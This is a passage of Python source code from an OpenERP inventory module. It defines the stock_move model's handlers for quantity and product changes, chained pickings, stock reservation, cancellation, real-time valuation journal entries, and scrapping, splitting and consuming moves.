            frozen_fields = set(['product_qty', 'product_uom', 'product_uos_qty', 'product_uos', 'location_id', 'location_dest_id', 'product_id'])
            for move in self.browse(cr, uid, ids, context=context):
                if move.state == 'done':
                    if frozen_fields.intersection(vals):
                        raise osv.except_osv(_('Operation Forbidden!'),
                                             _('Quantities, Units of Measure, Products and Locations cannot be modified on stock moves that have already been processed (except by the Administrator).'))
        return  super(stock_move, self).write(cr, uid, ids, vals, context=context)

    def copy(self, cr, uid, id, default=None, context=None):
        if default is None:
            default = {}
        default = default.copy()
        default.update({'move_history_ids2': [], 'move_history_ids': []})
        return super(stock_move, self).copy(cr, uid, id, default, context=context)

    def _auto_init(self, cursor, context=None):
        res = super(stock_move, self)._auto_init(cursor, context=context)
        cursor.execute('SELECT indexname \
                FROM pg_indexes \
                WHERE indexname = \'stock_move_location_id_location_dest_id_product_id_state\'')
        if not cursor.fetchone():
            cursor.execute('CREATE INDEX stock_move_location_id_location_dest_id_product_id_state \
                    ON stock_move (product_id, state, location_id, location_dest_id)')
        return res

    def onchange_lot_id(self, cr, uid, ids, prodlot_id=False, product_qty=False,
                        loc_id=False, product_id=False, uom_id=False, context=None):
        """ On change of production lot gives a warning message.
        @param prodlot_id: Changed production lot id
        @param product_qty: Quantity of product
        @param loc_id: Location id
        @param product_id: Product id
        @return: Warning message
        """
        if not prodlot_id or not loc_id:
            return {}
        ctx = context and context.copy() or {}
        ctx['location_id'] = loc_id
        ctx.update({'raise-exception': True})
        uom_obj = self.pool.get('product.uom')
        product_obj = self.pool.get('product.product')
        product_uom = product_obj.browse(cr, uid, product_id, context=ctx).uom_id
        prodlot = self.pool.get('stock.production.lot').browse(cr, uid, prodlot_id, context=ctx)
        location = self.pool.get('stock.location').browse(cr, uid, loc_id, context=ctx)
        uom = uom_obj.browse(cr, uid, uom_id, context=ctx)
        amount_actual = uom_obj._compute_qty_obj(cr, uid, product_uom, prodlot.stock_available, uom, context=ctx)
        warning = {}
        if (location.usage == 'internal') and (product_qty > (amount_actual or 0.0)):
            warning = {
                'title': _('Insufficient Stock for Serial Number !'),
                'message': _('You are moving %.2f %s but only %.2f %s available for this serial number.') % (product_qty, uom.name, amount_actual, uom.name)
            }
        return {'warning': warning}

    def onchange_quantity(self, cr, uid, ids, product_id, product_qty,
                          product_uom, product_uos):
        """ On change of product quantity finds UoM and UoS quantities
        @param product_id: Product id
        @param product_qty: Changed Quantity of product
        @param product_uom: Unit of measure of product
        @param product_uos: Unit of sale of product
        @return: Dictionary of values
        """
        result = {
                  'product_uos_qty': 0.00
          }
        warning = {}

        if (not product_id) or (product_qty <=0.0):
            result['product_qty'] = 0.0
            return {'value': result}

        product_obj = self.pool.get('product.product')
        uos_coeff = product_obj.read(cr, uid, product_id, ['uos_coeff'])
        
        # Warn if the quantity was decreased 
        if ids:
            for move in self.read(cr, uid, ids, ['product_qty']):
                if product_qty < move['product_qty']:
                    warning.update({
                       'title': _('Information'),
                       'message': _("By changing this quantity here, you accept the "
                                "new quantity as complete: OpenERP will not "
                                "automatically generate a back order.") })
                break

        if product_uos and product_uom and (product_uom != product_uos):
            result['product_uos_qty'] = product_qty * uos_coeff['uos_coeff']
        else:
            result['product_uos_qty'] = product_qty

        return {'value': result, 'warning': warning}

    def onchange_uos_quantity(self, cr, uid, ids, product_id, product_uos_qty,
                          product_uos, product_uom):
        """ On change of product quantity finds UoM and UoS quantities
        @param product_id: Product id
        @param product_uos_qty: Changed UoS Quantity of product
        @param product_uom: Unit of measure of product
        @param product_uos: Unit of sale of product
        @return: Dictionary of values
        """
        result = {
                  'product_qty': 0.00
          }
        warning = {}

        if (not product_id) or (product_uos_qty <=0.0):
            result['product_uos_qty'] = 0.0
            return {'value': result}

        product_obj = self.pool.get('product.product')
        uos_coeff = product_obj.read(cr, uid, product_id, ['uos_coeff'])
        
        # Warn if the quantity was decreased 
        for move in self.read(cr, uid, ids, ['product_uos_qty']):
            if product_uos_qty < move['product_uos_qty']:
                warning.update({
                   'title': _('Warning: No Back Order'),
                   'message': _("By changing the quantity here, you accept the "
                                "new quantity as complete: OpenERP will not "
                                "automatically generate a Back Order.") })
                break

        if product_uos and product_uom and (product_uom != product_uos):
            result['product_qty'] = product_uos_qty / uos_coeff['uos_coeff']
        else:
            result['product_qty'] = product_uos_qty
        return {'value': result, 'warning': warning}

    def onchange_product_id(self, cr, uid, ids, prod_id=False, loc_id=False,
                            loc_dest_id=False, partner_id=False):
        """ On change of product id, if finds UoM, UoS, quantity and UoS quantity.
        @param prod_id: Changed Product id
        @param loc_id: Source location id
        @param loc_dest_id: Destination location id
        @param partner_id: Address id of partner
        @return: Dictionary of values
        """
        if not prod_id:
            return {}
        user = self.pool.get('res.users').browse(cr, uid, uid)
        lang = user and user.lang or False
        if partner_id:
            addr_rec = self.pool.get('res.partner').browse(cr, uid, partner_id)
            if addr_rec:
                lang = addr_rec and addr_rec.lang or False
        ctx = {'lang': lang}

        product = self.pool.get('product.product').browse(cr, uid, [prod_id], context=ctx)[0]
        uos_id  = product.uos_id and product.uos_id.id or False
        result = {
            'product_uom': product.uom_id.id,
            'product_uos': uos_id,
            'product_qty': 1.00,
            'product_uos_qty' : self.pool.get('stock.move').onchange_quantity(cr, uid, ids, prod_id, 1.00, product.uom_id.id, uos_id)['value']['product_uos_qty'],
            'prodlot_id' : False,
        }
        if not ids:
            result['name'] = product.partner_ref
        if loc_id:
            result['location_id'] = loc_id
        if loc_dest_id:
            result['location_dest_id'] = loc_dest_id
        return {'value': result}

    def onchange_move_type(self, cr, uid, ids, type, context=None):
        """ On change of move type gives sorce and destination location.
        @param type: Move Type
        @return: Dictionary of values
        """
        mod_obj = self.pool.get('ir.model.data')
        location_source_id = 'stock_location_stock'
        location_dest_id = 'stock_location_stock'
        if type == 'in':
            location_source_id = 'stock_location_suppliers'
            location_dest_id = 'stock_location_stock'
        elif type == 'out':
            location_source_id = 'stock_location_stock'
            location_dest_id = 'stock_location_customers'
        try:
            source_location = mod_obj.get_object_reference(cr, uid, 'stock', location_source_id)
            with tools.mute_logger('openerp.osv.orm'):
                self.pool.get('stock.location').check_access_rule(cr, uid, [source_location[1]], 'read', context=context)
        except (orm.except_orm, ValueError):
            source_location = False
        try:
            dest_location = mod_obj.get_object_reference(cr, uid, 'stock', location_dest_id)
            with tools.mute_logger('openerp.osv.orm'):
                self.pool.get('stock.location').check_access_rule(cr, uid, [dest_location[1]], 'read', context=context)
        except (orm.except_orm, ValueError):
            dest_location = False
        return {'value':{'location_id': source_location and source_location[1] or False, 'location_dest_id': dest_location and dest_location[1] or False}}

    def onchange_date(self, cr, uid, ids, date, date_expected, context=None):
        """ On change of Scheduled Date gives a Move date.
        @param date_expected: Scheduled Date
        @param date: Move Date
        @return: Move Date
        """
        if not date_expected:
            date_expected = time.strftime('%Y-%m-%d %H:%M:%S')
        return {'value':{'date': date_expected}}

    def _chain_compute(self, cr, uid, moves, context=None):
        """ Finds whether the location has chained location type or not.
        @param moves: Stock moves
        @return: Dictionary containing destination location with chained location type.
        """
        result = {}
        for m in moves:
            dest = self.pool.get('stock.location').chained_location_get(
                cr,
                uid,
                m.location_dest_id,
                m.picking_id and m.picking_id.partner_id and m.picking_id.partner_id,
                m.product_id,
                context
            )
            if dest:
                if dest[1] == 'transparent':
                    newdate = (datetime.strptime(m.date, '%Y-%m-%d %H:%M:%S') + relativedelta(days=dest[2] or 0)).strftime('%Y-%m-%d')
                    self.write(cr, uid, [m.id], {
                        'date': newdate,
                        'location_dest_id': dest[0].id})
                    if m.picking_id and (dest[3] or dest[5]):
                        self.pool.get('stock.picking').write(cr, uid, [m.picking_id.id], {
                            'stock_journal_id': dest[3] or m.picking_id.stock_journal_id.id,
                            'type': dest[5] or m.picking_id.type
                        }, context=context)
                    m.location_dest_id = dest[0]
                    res2 = self._chain_compute(cr, uid, [m], context=context)
                    for pick_id in res2.keys():
                        result.setdefault(pick_id, [])
                        result[pick_id] += res2[pick_id]
                else:
                    result.setdefault(m.picking_id, [])
                    result[m.picking_id].append( (m, dest) )
        return result

    def _prepare_chained_picking(self, cr, uid, picking_name, picking, picking_type, moves_todo, context=None):
        """Prepare the definition (values) to create a new chained picking.

           :param str picking_name: desired new picking name
           :param browse_record picking: source picking (being chained to)
           :param str picking_type: desired new picking type
           :param list moves_todo: specification of the stock moves to be later included in this
               picking, in the form::

                   [[move, (dest_location, auto_packing, chained_delay, chained_journal,
                                  chained_company_id, chained_picking_type)],
                    ...
                   ]

               See also :meth:`stock_location.chained_location_get`.
        """
        res_company = self.pool.get('res.company')
        return {
                    'name': picking_name,
                    'origin': tools.ustr(picking.origin or ''),
                    'type': picking_type,
                    'note': picking.note,
                    'move_type': picking.move_type,
                    'auto_picking': moves_todo[0][1][1] == 'auto',
                    'stock_journal_id': moves_todo[0][1][3],
                    'company_id': moves_todo[0][1][4] or res_company._company_default_get(cr, uid, 'stock.company', context=context),
                    'partner_id': picking.partner_id.id,
                    'invoice_state': 'none',
                    'date': picking.date,
                }

    def _create_chained_picking(self, cr, uid, picking_name, picking, picking_type, moves_todo, context=None):
        picking_obj = self.pool.get('stock.picking')
        return picking_obj.create(cr, uid, self._prepare_chained_picking(cr, uid, picking_name, picking, picking_type, moves_todo, context=context))

    def create_chained_picking(self, cr, uid, moves, context=None):
        res_obj = self.pool.get('res.company')
        location_obj = self.pool.get('stock.location')
        move_obj = self.pool.get('stock.move')
        wf_service = netsvc.LocalService("workflow")
        new_moves = []
        if context is None:
            context = {}
        seq_obj = self.pool.get('ir.sequence')
        for picking, todo in self._chain_compute(cr, uid, moves, context=context).items():
            ptype = todo[0][1][5] and todo[0][1][5] or location_obj.picking_type_get(cr, uid, todo[0][0].location_dest_id, todo[0][1][0])
            if picking:
                # name of new picking according to its type
                if ptype == 'internal':
                    new_pick_name = seq_obj.get(cr, uid,'stock.picking')
                else :
                    new_pick_name = seq_obj.get(cr, uid, 'stock.picking.' + ptype)
                pickid = self._create_chained_picking(cr, uid, new_pick_name, picking, ptype, todo, context=context)
                # Need to check name of old picking because it always considers picking as "OUT" when created from Sales Order
                old_ptype = location_obj.picking_type_get(cr, uid, picking.move_lines[0].location_id, picking.move_lines[0].location_dest_id)
                if old_ptype != picking.type:
                    old_pick_name = seq_obj.get(cr, uid, 'stock.picking.' + old_ptype)
                    self.pool.get('stock.picking').write(cr, uid, [picking.id], {'name': old_pick_name, 'type': old_ptype}, context=context)
            else:
                pickid = False
            for move, (loc, dummy, delay, dummy, company_id, ptype, invoice_state) in todo:
                new_id = move_obj.copy(cr, uid, move.id, {
                    'location_id': move.location_dest_id.id,
                    'location_dest_id': loc.id,
                    'date': time.strftime('%Y-%m-%d'),
                    'picking_id': pickid,
                    'state': 'waiting',
                    'company_id': company_id or res_obj._company_default_get(cr, uid, 'stock.company', context=context)  ,
                    'move_history_ids': [],
                    'date_expected': (datetime.strptime(move.date, '%Y-%m-%d %H:%M:%S') + relativedelta(days=delay or 0)).strftime('%Y-%m-%d'),
                    'move_history_ids2': []}
                )
                move_obj.write(cr, uid, [move.id], {
                    'move_dest_id': new_id,
                    'move_history_ids': [(4, new_id)]
                })
                new_moves.append(self.browse(cr, uid, [new_id])[0])
            if pickid:
                wf_service.trg_validate(uid, 'stock.picking', pickid, 'button_confirm', cr)
        if new_moves:
            new_moves += self.create_chained_picking(cr, uid, new_moves, context)
        return new_moves

    def action_confirm(self, cr, uid, ids, context=None):
        """ Confirms stock move.
        @return: List of ids.
        """
        moves = self.browse(cr, uid, ids, context=context)
        self.write(cr, uid, ids, {'state': 'confirmed'})
        self.create_chained_picking(cr, uid, moves, context)
        return []

    def action_assign(self, cr, uid, ids, *args):
        """ Changes state to confirmed or waiting.
        @return: List of values
        """
        todo = []
        for move in self.browse(cr, uid, ids):
            if move.state in ('confirmed', 'waiting'):
                todo.append(move.id)
        res = self.check_assign(cr, uid, todo)
        return res

    def force_assign(self, cr, uid, ids, context=None):
        """ Changes the state to assigned.
        @return: True
        """
        self.write(cr, uid, ids, {'state': 'assigned'})
        wf_service = netsvc.LocalService('workflow')
        for move in self.browse(cr, uid, ids, context):
            if move.picking_id:
                wf_service.trg_write(uid, 'stock.picking', move.picking_id.id, cr)
        return True

    def cancel_assign(self, cr, uid, ids, context=None):
        """ Changes the state to confirmed.
        @return: True
        """
        self.write(cr, uid, ids, {'state': 'confirmed'})

        # fix for bug lp:707031
        # called write of related picking because changing move availability does
        # not trigger workflow of picking in order to change the state of picking
        wf_service = netsvc.LocalService('workflow')
        for move in self.browse(cr, uid, ids, context):
            if move.picking_id:
                wf_service.trg_write(uid, 'stock.picking', move.picking_id.id, cr)
        return True

    #
    # Duplicate stock.move
    #
    def check_assign(self, cr, uid, ids, context=None):
        """ Checks the product type and accordingly writes the state.
        @return: No. of moves done
        """
        done = []
        count = 0
        pickings = {}
        if context is None:
            context = {}
        for move in self.browse(cr, uid, ids, context=context):
            if move.product_id.type == 'consu' or move.location_id.usage == 'supplier':
                if move.state in ('confirmed', 'waiting'):
                    done.append(move.id)
                pickings[move.picking_id.id] = 1
                continue
            if move.state in ('confirmed', 'waiting'):
                # Important: we must pass lock=True to _product_reserve() to avoid race conditions and double reservations
                res = self.pool.get('stock.location')._product_reserve(cr, uid, [move.location_id.id], move.product_id.id, move.product_qty, {'uom': move.product_uom.id}, lock=True)
                if res:
                    #_product_available_test depends on the next status for correct functioning
                    #the test does not work correctly if the same product occurs multiple times
                    #in the same order. This is e.g. the case when using the button 'split in two' of
                    #the stock outgoing form
                    self.write(cr, uid, [move.id], {'state':'assigned'})
                    done.append(move.id)
                    pickings[move.picking_id.id] = 1
                    r = res.pop(0)
                    product_uos_qty = self.pool.get('stock.move').onchange_quantity(cr, uid, ids, move.product_id.id, r[0], move.product_id.uom_id.id, move.product_id.uos_id.id)['value']['product_uos_qty']
                    cr.execute('update stock_move set location_id=%s, product_qty=%s, product_uos_qty=%s where id=%s', (r[1], r[0],product_uos_qty, move.id))

                    while res:
                        r = res.pop(0)
                        product_uos_qty = self.pool.get('stock.move').onchange_quantity(cr, uid, ids, move.product_id.id, r[0], move.product_id.uom_id.id, move.product_id.uos_id.id)['value']['product_uos_qty']
                        move_id = self.copy(cr, uid, move.id, {'product_uos_qty': product_uos_qty, 'product_qty': r[0], 'location_id': r[1]})
                        done.append(move_id)
        if done:
            count += len(done)
            self.write(cr, uid, done, {'state': 'assigned'})

        if count:
            for pick_id in pickings:
                wf_service = netsvc.LocalService("workflow")
                wf_service.trg_write(uid, 'stock.picking', pick_id, cr)
        return count

    def setlast_tracking(self, cr, uid, ids, context=None):
        tracking_obj = self.pool.get('stock.tracking')
        picking = self.browse(cr, uid, ids, context=context)[0].picking_id
        if picking:
            last_track = [line.tracking_id.id for line in picking.move_lines if line.tracking_id]
            if not last_track:
                last_track = tracking_obj.create(cr, uid, {}, context=context)
            else:
                last_track.sort()
                last_track = last_track[-1]
            self.write(cr, uid, ids, {'tracking_id': last_track})
        return True

    #
    # Cancel move => cancel others move and pickings
    #
    def action_cancel(self, cr, uid, ids, context=None):
        """ Cancels the moves and if all moves are cancelled it cancels the picking.
        @return: True
        """
        if not len(ids):
            return True
        if context is None:
            context = {}
        pickings = set()
        for move in self.browse(cr, uid, ids, context=context):
            if move.state in ('confirmed', 'waiting', 'assigned', 'draft'):
                if move.picking_id:
                    pickings.add(move.picking_id.id)
            if move.move_dest_id and move.move_dest_id.state == 'waiting':
                self.write(cr, uid, [move.move_dest_id.id], {'state': 'confirmed'}, context=context)
                if context.get('call_unlink',False) and move.move_dest_id.picking_id:
                    wf_service = netsvc.LocalService("workflow")
                    wf_service.trg_write(uid, 'stock.picking', move.move_dest_id.picking_id.id, cr)
        self.write(cr, uid, ids, {'state': 'cancel', 'move_dest_id': False}, context=context)
        if not context.get('call_unlink',False):
            for pick in self.pool.get('stock.picking').browse(cr, uid, list(pickings), context=context):
                if all(move.state == 'cancel' for move in pick.move_lines):
                    self.pool.get('stock.picking').write(cr, uid, [pick.id], {'state': 'cancel'}, context=context)

        wf_service = netsvc.LocalService("workflow")
        for id in ids:
            wf_service.trg_trigger(uid, 'stock.move', id, cr)
        return True

    def _get_accounting_data_for_valuation(self, cr, uid, move, context=None):
        """
        Return the accounts and journal to use to post Journal Entries for the real-time
        valuation of the move.

        :param context: context dictionary that can explicitly mention the company to consider via the 'force_company' key
        :raise: osv.except_osv() is any mandatory account or journal is not defined.
        """
        product_obj=self.pool.get('product.product')
        accounts = product_obj.get_product_accounts(cr, uid, move.product_id.id, context)
        if move.location_id.valuation_out_account_id:
            acc_src = move.location_id.valuation_out_account_id.id
        else:
            acc_src = accounts['stock_account_input']

        if move.location_dest_id.valuation_in_account_id:
            acc_dest = move.location_dest_id.valuation_in_account_id.id
        else:
            acc_dest = accounts['stock_account_output']

        acc_valuation = accounts.get('property_stock_valuation_account_id', False)
        journal_id = accounts['stock_journal']

        if acc_dest == acc_valuation:
            raise osv.except_osv(_('Error!'),  _('Cannot create Journal Entry, Output Account of this product and Valuation account on category of this product are same.'))

        if acc_src == acc_valuation:
            raise osv.except_osv(_('Error!'),  _('Cannot create Journal Entry, Input Account of this product and Valuation account on category of this product are same.'))

        if not acc_src:
            raise osv.except_osv(_('Error!'),  _('Please define stock input account for this product or its category: "%s" (id: %d)') % \
                                    (move.product_id.name, move.product_id.id,))
        if not acc_dest:
            raise osv.except_osv(_('Error!'),  _('Please define stock output account for this product or its category: "%s" (id: %d)') % \
                                    (move.product_id.name, move.product_id.id,))
        if not journal_id:
            raise osv.except_osv(_('Error!'), _('Please define journal on the product category: "%s" (id: %d)') % \
                                    (move.product_id.categ_id.name, move.product_id.categ_id.id,))
        if not acc_valuation:
            raise osv.except_osv(_('Error!'), _('Please define inventory valuation account on the product category: "%s" (id: %d)') % \
                                    (move.product_id.categ_id.name, move.product_id.categ_id.id,))
        return journal_id, acc_src, acc_dest, acc_valuation

    def _get_reference_accounting_values_for_valuation(self, cr, uid, move, context=None):
        """
        Return the reference amount and reference currency representing the inventory valuation for this move.
        These reference values should possibly be converted before being posted in Journals to adapt to the primary
        and secondary currencies of the relevant accounts.
        """
        product_uom_obj = self.pool.get('product.uom')

        # by default the reference currency is that of the move's company
        reference_currency_id = move.company_id.currency_id.id

        default_uom = move.product_id.uom_id.id
        qty = product_uom_obj._compute_qty(cr, uid, move.product_uom.id, move.product_qty, default_uom)

        # if product is set to average price and a specific value was entered in the picking wizard,
        # we use it
        if move.product_id.cost_method == 'average' and move.price_unit:
            reference_amount = qty * move.price_unit
            reference_currency_id = move.price_currency_id.id or reference_currency_id

        # Otherwise we default to the company's valuation price type, considering that the values of the
        # valuation field are expressed in the default currency of the move's company.
        else:
            if context is None:
                context = {}
            currency_ctx = dict(context, currency_id = move.company_id.currency_id.id)
            amount_unit = move.product_id.price_get('standard_price', context=currency_ctx)[move.product_id.id]
            reference_amount = amount_unit * qty

        return reference_amount, reference_currency_id


    def _create_product_valuation_moves(self, cr, uid, move, context=None):
        """
        Generate the appropriate accounting moves if the product being moves is subject
        to real_time valuation tracking, and the source or destination location is
        a transit location or is outside of the company.
        """
        if move.product_id.valuation == 'real_time': # FIXME: product valuation should perhaps be a property?
            if context is None:
                context = {}
            src_company_ctx = dict(context,force_company=move.location_id.company_id.id)
            dest_company_ctx = dict(context,force_company=move.location_dest_id.company_id.id)
            account_moves = []
            # Outgoing moves (or cross-company output part)
            if move.location_id.company_id \
                and (move.location_id.usage == 'internal' and move.location_dest_id.usage != 'internal'\
                     or move.location_id.company_id != move.location_dest_id.company_id):
                journal_id, acc_src, acc_dest, acc_valuation = self._get_accounting_data_for_valuation(cr, uid, move, src_company_ctx)
                reference_amount, reference_currency_id = self._get_reference_accounting_values_for_valuation(cr, uid, move, src_company_ctx)
                #returning goods to supplier
                if move.location_dest_id.usage == 'supplier':
                    account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_valuation, acc_src, reference_amount, reference_currency_id, context))]
                else:
                    account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_valuation, acc_dest, reference_amount, reference_currency_id, context))]

            # Incoming moves (or cross-company input part)
            if move.location_dest_id.company_id \
                and (move.location_id.usage != 'internal' and move.location_dest_id.usage == 'internal'\
                     or move.location_id.company_id != move.location_dest_id.company_id):
                journal_id, acc_src, acc_dest, acc_valuation = self._get_accounting_data_for_valuation(cr, uid, move, dest_company_ctx)
                reference_amount, reference_currency_id = self._get_reference_accounting_values_for_valuation(cr, uid, move, src_company_ctx)
                #goods return from customer
                if move.location_id.usage == 'customer':
                    account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_dest, acc_valuation, reference_amount, reference_currency_id, context))]
                else:
                    account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_src, acc_valuation, reference_amount, reference_currency_id, context))]

            move_obj = self.pool.get('account.move')
            for j_id, move_lines in account_moves:
                move_obj.create(cr, uid,
                        {
                         'journal_id': j_id,
                         'line_id': move_lines,
                         'ref': move.picking_id and move.picking_id.name}, context=context)

    def action_done(self, cr, uid, ids, context=None):
        """ Makes the move done and if all moves are done, it will finish the picking.
        @return:
        """
        picking_ids = []
        move_ids = []
        wf_service = netsvc.LocalService("workflow")
        if context is None:
            context = {}

        todo = []
        for move in self.browse(cr, uid, ids, context=context):
            if move.state=="draft":
                todo.append(move.id)
        if todo:
            self.action_confirm(cr, uid, todo, context=context)
            todo = []

        for move in self.browse(cr, uid, ids, context=context):
            if move.state in ['done','cancel']:
                continue
            move_ids.append(move.id)

            if move.picking_id:
                picking_ids.append(move.picking_id.id)
            if move.move_dest_id.id and (move.state != 'done'):
                # Downstream move should only be triggered if this move is the last pending upstream move
                other_upstream_move_ids = self.search(cr, uid, [('id','!=',move.id),('state','not in',['done','cancel']),
                                            ('move_dest_id','=',move.move_dest_id.id)], context=context)
                if not other_upstream_move_ids:
                    self.write(cr, uid, [move.id], {'move_history_ids': [(4, move.move_dest_id.id)]})
                    if move.move_dest_id.state in ('waiting', 'confirmed'):
                        self.force_assign(cr, uid, [move.move_dest_id.id], context=context)
                        if move.move_dest_id.picking_id:
                            wf_service.trg_write(uid, 'stock.picking', move.move_dest_id.picking_id.id, cr)
                        if move.move_dest_id.auto_validate:
                            self.action_done(cr, uid, [move.move_dest_id.id], context=context)

            self._create_product_valuation_moves(cr, uid, move, context=context)
            if move.state not in ('confirmed','done','assigned'):
                todo.append(move.id)

        if todo:
            self.action_confirm(cr, uid, todo, context=context)

        self.write(cr, uid, move_ids, {'state': 'done', 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)}, context=context)
        for id in move_ids:
             wf_service.trg_trigger(uid, 'stock.move', id, cr)

        for pick_id in picking_ids:
            wf_service.trg_write(uid, 'stock.picking', pick_id, cr)

        return True

    def _create_account_move_line(self, cr, uid, move, src_account_id, dest_account_id, reference_amount, reference_currency_id, context=None):
        """
        Generate the account.move.line values to post to track the stock valuation difference due to the
        processing of the given stock move.
        """
        # prepare default values considering that the destination accounts have the reference_currency_id as their main currency
        partner_id = (move.picking_id.partner_id and self.pool.get('res.partner')._find_accounting_partner(move.picking_id.partner_id).id) or False
        debit_line_vals = {
                    'name': move.name,
                    'product_id': move.product_id and move.product_id.id or False,
                    'quantity': move.product_qty,
                    'ref': move.picking_id and move.picking_id.name or False,
                    'date': time.strftime('%Y-%m-%d'),
                    'partner_id': partner_id,
                    'debit': reference_amount,
                    'account_id': dest_account_id,
        }
        credit_line_vals = {
                    'name': move.name,
                    'product_id': move.product_id and move.product_id.id or False,
                    'quantity': move.product_qty,
                    'ref': move.picking_id and move.picking_id.name or False,
                    'date': time.strftime('%Y-%m-%d'),
                    'partner_id': partner_id,
                    'credit': reference_amount,
                    'account_id': src_account_id,
        }

        # if we are posting to accounts in a different currency, provide correct values in both currencies correctly
        # when compatible with the optional secondary currency on the account.
        # Financial Accounts only accept amounts in secondary currencies if there's no secondary currency on the account
        # or if it's the same as that of the secondary amount being posted.
        account_obj = self.pool.get('account.account')
        src_acct, dest_acct = account_obj.browse(cr, uid, [src_account_id, dest_account_id], context=context)
        src_main_currency_id = src_acct.company_id.currency_id.id
        dest_main_currency_id = dest_acct.company_id.currency_id.id
        cur_obj = self.pool.get('res.currency')
        if reference_currency_id != src_main_currency_id:
            # fix credit line:
            credit_line_vals['credit'] = cur_obj.compute(cr, uid, reference_currency_id, src_main_currency_id, reference_amount, context=context)
            if (not src_acct.currency_id) or src_acct.currency_id.id == reference_currency_id:
                credit_line_vals.update(currency_id=reference_currency_id, amount_currency=-reference_amount)
        if reference_currency_id != dest_main_currency_id:
            # fix debit line:
            debit_line_vals['debit'] = cur_obj.compute(cr, uid, reference_currency_id, dest_main_currency_id, reference_amount, context=context)
            if (not dest_acct.currency_id) or dest_acct.currency_id.id == reference_currency_id:
                debit_line_vals.update(currency_id=reference_currency_id, amount_currency=reference_amount)

        return [(0, 0, debit_line_vals), (0, 0, credit_line_vals)]

    def unlink(self, cr, uid, ids, context=None):
        if context is None:
            context = {}
        ctx = context.copy()
        for move in self.browse(cr, uid, ids, context=context):
            if move.state != 'draft' and not ctx.get('call_unlink', False):
                raise osv.except_osv(_('User Error!'), _('You can only delete draft moves.'))
        return super(stock_move, self).unlink(
            cr, uid, ids, context=ctx)

    # _create_lot function is not used anywhere
    def _create_lot(self, cr, uid, ids, product_id, prefix=False):
        """ Creates production lot
        @return: Production lot id
        """
        prodlot_obj = self.pool.get('stock.production.lot')
        prodlot_id = prodlot_obj.create(cr, uid, {'prefix': prefix, 'product_id': product_id})
        return prodlot_id

    def action_scrap(self, cr, uid, ids, quantity, location_id, context=None):
        """ Move the scrap/damaged product into scrap location
        @param cr: the database cursor
        @param uid: the user id
        @param ids: ids of stock move object to be scrapped
        @param quantity : specify scrap qty
        @param location_id : specify scrap location
        @param context: context arguments
        @return: Scraped lines
        """
        #quantity should in MOVE UOM
        if quantity <= 0:
            raise osv.except_osv(_('Warning!'), _('Please provide a positive quantity to scrap.'))
        res = []
        for move in self.browse(cr, uid, ids, context=context):
            source_location = move.location_id
            if move.state == 'done':
                source_location = move.location_dest_id
            if source_location.usage != 'internal':
                #restrict to scrap from a virtual location because it's meaningless and it may introduce errors in stock ('creating' new products from nowhere)
                raise osv.except_osv(_('Error!'), _('Forbidden operation: it is not allowed to scrap products from a virtual location.'))
            move_qty = move.product_qty
            uos_qty = quantity / move_qty * move.product_uos_qty
            default_val = {
                'location_id': source_location.id,
                'product_qty': quantity,
                'product_uos_qty': uos_qty,
                'state': move.state,
                'scrapped': True,
                'location_dest_id': location_id,
                'tracking_id': move.tracking_id.id,
                'prodlot_id': move.prodlot_id.id,
            }
            new_move = self.copy(cr, uid, move.id, default_val)

            res += [new_move]
            product_obj = self.pool.get('product.product')
            for product in product_obj.browse(cr, uid, [move.product_id.id], context=context):
                if move.picking_id:
                    uom = product.uom_id.name if product.uom_id else ''
                    message = _("%s %s %s has been <b>moved to</b> scrap.") % (quantity, uom, product.name)
                    move.picking_id.message_post(body=message)

        self.action_done(cr, uid, res, context=context)
        return res

    # action_split function is not used anywhere
    # FIXME: deprecate this method
    def action_split(self, cr, uid, ids, quantity, split_by_qty=1, prefix=False, with_lot=True, context=None):
        """ Split Stock Move lines into production lot which specified split by quantity.
        @param cr: the database cursor
        @param uid: the user id
        @param ids: ids of stock move object to be splited
        @param split_by_qty : specify split by qty
        @param prefix : specify prefix of production lot
        @param with_lot : if true, prodcution lot will assign for split line otherwise not.
        @param context: context arguments
        @return: Splited move lines
        """

        if context is None:
            context = {}
        if quantity <= 0:
            raise osv.except_osv(_('Warning!'), _('Please provide proper quantity.'))

        res = []

        for move in self.browse(cr, uid, ids, context=context):
            if split_by_qty <= 0 or quantity == 0:
                return res

            uos_qty = split_by_qty / move.product_qty * move.product_uos_qty

            quantity_rest = quantity % split_by_qty
            uos_qty_rest = split_by_qty / move.product_qty * move.product_uos_qty

            update_val = {
                'product_qty': split_by_qty,
                'product_uos_qty': uos_qty,
            }
            for idx in range(int(quantity//split_by_qty)):
                if not idx and move.product_qty<=quantity:
                    current_move = move.id
                else:
                    current_move = self.copy(cr, uid, move.id, {'state': move.state})
                res.append(current_move)
                if with_lot:
                    update_val['prodlot_id'] = self._create_lot(cr, uid, [current_move], move.product_id.id)

                self.write(cr, uid, [current_move], update_val)


            if quantity_rest > 0:
                idx = int(quantity//split_by_qty)
                update_val['product_qty'] = quantity_rest
                update_val['product_uos_qty'] = uos_qty_rest
                if not idx and move.product_qty<=quantity:
                    current_move = move.id
                else:
                    current_move = self.copy(cr, uid, move.id, {'state': move.state})

                res.append(current_move)


                if with_lot:
                    update_val['prodlot_id'] = self._create_lot(cr, uid, [current_move], move.product_id.id)

                self.write(cr, uid, [current_move], update_val)
        return res

    def action_consume(self, cr, uid, ids, quantity, location_id=False, context=None):
        """ Consumed product with specific quatity from specific source location
        @param cr: the database cursor
        @param uid: the user id
        @param ids: ids of stock move object to be consumed
        @param quantity : specify consume quantity
        @param location_id : specify source location
        @param context: context arguments
        @return: Consumed lines
        """
        #quantity should in MOVE UOM
        if context is None:
            context = {}
        if quantity <= 0:
            raise osv.except_osv(_('Warning!'), _('Please provide proper quantity.'))
        res = []
        for move in self.browse(cr, uid, ids, context=context):
            move_qty = move.product_qty
            if move_qty <= 0:
                raise osv.except_osv(_('Error!'), _('Cannot consume a move with negative or zero quantity.'))
            quantity_rest = move.product_qty
            quantity_rest -= quantity
            uos_qty_rest = quantity_rest / move_qty * move.product_uos_qty
            if quantity_rest <= 0:
                quantity_rest = 0
                uos_qty_rest = 0
                quantity = move.product_qty

            uos_qty = quantity / move_qty * move.product_uos_qty
            if float_compare(quantity_rest, 0, precision_rounding=move.product_id.uom_id.rounding):
                default_val = {
                    'product_qty': quantity,
                    'product_uos_qty': uos_qty,
